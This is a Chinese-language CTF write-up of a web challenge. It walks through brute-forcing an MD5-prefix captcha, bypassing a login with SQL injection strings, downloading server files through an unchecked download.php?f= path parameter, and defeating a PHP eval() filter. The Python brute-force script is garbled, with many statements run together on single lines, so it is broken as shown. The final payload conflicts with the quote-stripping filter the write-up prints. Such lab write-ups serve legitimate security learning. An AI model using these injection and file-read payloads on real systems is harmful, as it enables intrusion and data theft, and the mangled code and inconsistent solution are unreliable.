题目

考点

sql注入，md5加密，代码审计，利用eval函数

解题

参考wp

https://www.cnblogs.com/qiaowukong/p/13630130.html

找md5值

看见验证码中的提示，就是去找一个md5值前六位是指定值的数（严格来说不一定是数），白嫖大佬的脚本：

# -*- coding: UTF-8 -*-
'''
@File    ：GetFlag.py
@IDE     ：PyCharm 
@Author  ：M7
@Date    ：2024/3/21
'''
import hashlib
from multiprocessing.dummy import Pool as ThreadPool# MD5截断数值已知 求原始数据
# 例子 substr(md5(captcha), 0, 6)=60b7efdef md5(s):  # 计算MD5字符串return hashlib.md5(str(s).encode('utf-8')).hexdigest()keymd5 = 'cd0bf6'   #已知的md5截断值
md5start = 0   # 设置题目已知的截断位置
md5length = 6def findmd5(sss):    # 输入范围 里面会进行md5测试key = sss.split(':')start = int(key[0])   # 开始位置end = int(key[1])    # 结束位置result = 0for i in range(start, end):# print(md5(i)[md5start:md5length])if md5(i)[0:6] == keymd5:            # 拿到加密字符串result = iprint(result)    # 打印breaklist=[]  # 参数列表
for i in range(10):   # 多线程的数字列表 开始与结尾list.append(str(10000000*i) + ':' + str(10000000*(i+1)))
pool = ThreadPool()    # 多线程任务
pool.map(findmd5, list) # 函数 与参数列表
pool.close()
pool.join()

得到：

11481707
26143897
75290163

测试sql注入

admin' or 1=1--+
123
11481707

返回的界面有显示报错，那么就说明存在sql注入

接下来就是测试sql注入语句了

构造注入payload

admin' or '1'='1

访问可疑文件

点击三个文件都能下载下来，但是只有一个a.php文件有利用信息，得到flag在网站的根目录下

那么利用前面下载代码的功能，把flag.php文件下载下来

下载文件

构造下载文件payload

http://eci-2ze7er1y0cj85awr3unk.cloudeci1.ichunqiu.com/Challenges/file/download.php?f=/var/www/html/Challenges/flag.php

下载下来后，看到源码如下：

<?php
$f = $_POST['flag'];
$f = str_replace(array('`', '$', '*', '#', ':', '\\', '"', "'", '(', ')', '.', '>'), '', $f);
if((strlen($f) > 13) || (false !== stripos($f, 'return')))
{die('wowwwwwwwwwwwwwwwwwwwwwwwww');
}
try
{eval("\$spaceone = $f");
}
catch (Exception $e)
{return false;
}
if ($spaceone === 'flag'){echo file_get_contents("helloctf.php");
}?>

代码审计

16行的if判断为true时才会显示helloctf.php文件代码
变量$spaceone得在第10行得到运行
那么就得从第二行有一个post传参的功能入手了
第三行和第四行还对post传入的字符串进行了过滤

最终构造的payload为

post传参flag='flag';

改包发起请求

看到返回没有任何东西，那么在查看一下源代码，发现了有flag

提交flag